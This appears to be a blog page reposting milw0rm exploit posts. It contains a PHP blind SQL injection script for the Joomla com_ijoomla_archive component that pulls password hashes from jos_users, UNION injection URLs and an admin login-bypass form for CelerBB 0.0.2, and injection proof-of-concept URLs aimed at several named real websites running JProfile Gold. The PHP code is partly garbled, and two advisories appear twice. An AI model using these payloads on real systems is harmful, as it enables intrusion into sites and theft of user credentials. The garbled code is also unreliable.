?php
Joomla com_ijoomla_archive Blind SQL Injection Exploit
AUTHOR : Mountassif Moad
DATE : 5 mars 2009
APPLICATION : Joomla com_ijoomla_archive
DORK : inurl:"com_ijoomla_archive"
*/
ini_set("max_execution_time",0);
print_r('
com_ijoomla_archiv Blind SQL Injection Exploit
php '.$argv[0].' http://www.site.com/ real id
Demo :
php '.$argv[0].' http://thecatholicspirit.com/ 17
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < userid =" 1;" userid =" $argv[2];" r =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid="" 1="1" w =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid="" 1="0" t =" abs((100-($w/$r*100)));" j =" 1;" i =" 46;" i="$i+2)" i ="="" i =" 98;" laenge =" strlen(file_get_contents($url." option="com_ijoomla_archive&task="archive&search_archive="1&act="search&catid=""> $t-1) {
$laenge = strlen(file_get_contents($url."/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=".$userid."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1).""));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
} else {
echo "\nExploiting failed: find another site\n";
}
?>
# milw0rm
CelerBB 0.0.2 Multiple Remote Vulnerabilities
Application: CelerBB
Version: 0.0.2
Website: http://celerbb.sourceforge.net/
Bugs: [A] Multiple SQL Injection
[B] Information Disclosure
[C] Authenticaion Bypass
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: viewforum.php, viewtopic.php
This bug allows a guest to view username and
password list.
- [B] Information Disclosure
Requisites: none
File affected: showme.php
This bug allows a guest to view reserved
information of any user.
- [C] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: login.php
This bug allows a guest to bypass authentication.
Code
- [A] Multiple SQL Injection
http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23
- [B] Information Disclosure
http://www.site.com/path/showme.php?user=admin
- [C] Authentication Bypass
html
head
title CelerBB 0.0.2 Authentication Bypass Exploit /title
/head
body
form action="login.php" method="POST"
input type="hidden" name="Username" value="admin'#"
input type="submit" value="Exploit"
/form
/body
/html
Fix
No fix.
# milw0rm
Version: 0.0.2
Website: http://celerbb.sourceforge.net/
Bugs: [A] Multiple SQL Injection
[B] Information Disclosure
[C] Authenticaion Bypass
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: viewforum.php, viewtopic.php
This bug allows a guest to view username and
password list.
- [B] Information Disclosure
Requisites: none
File affected: showme.php
This bug allows a guest to view reserved
information of any user.
- [C] Authentication Bypass
Requisites: magic_quotes_gpc = off
File affected: login.php
This bug allows a guest to bypass authentication.
Code
- [A] Multiple SQL Injection
http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23
- [B] Information Disclosure
http://www.site.com/path/showme.php?user=admin
- [C] Authentication Bypass
html
head
title CelerBB 0.0.2 Authentication Bypass Exploit /title
/head
body
form action="login.php" method="POST"
input type="hidden" name="Username" value="admin'#"
input type="submit" value="Exploit"
/form
/body
/html
Fix
No fix.
# milw0rm
Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
Vendor : http://jogjacamp.com
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm
bugs : /index.php?action=news.detail&id_news=
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--
greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p
# milw0rm
Subscribe to:
Posts (Atom)
Posts
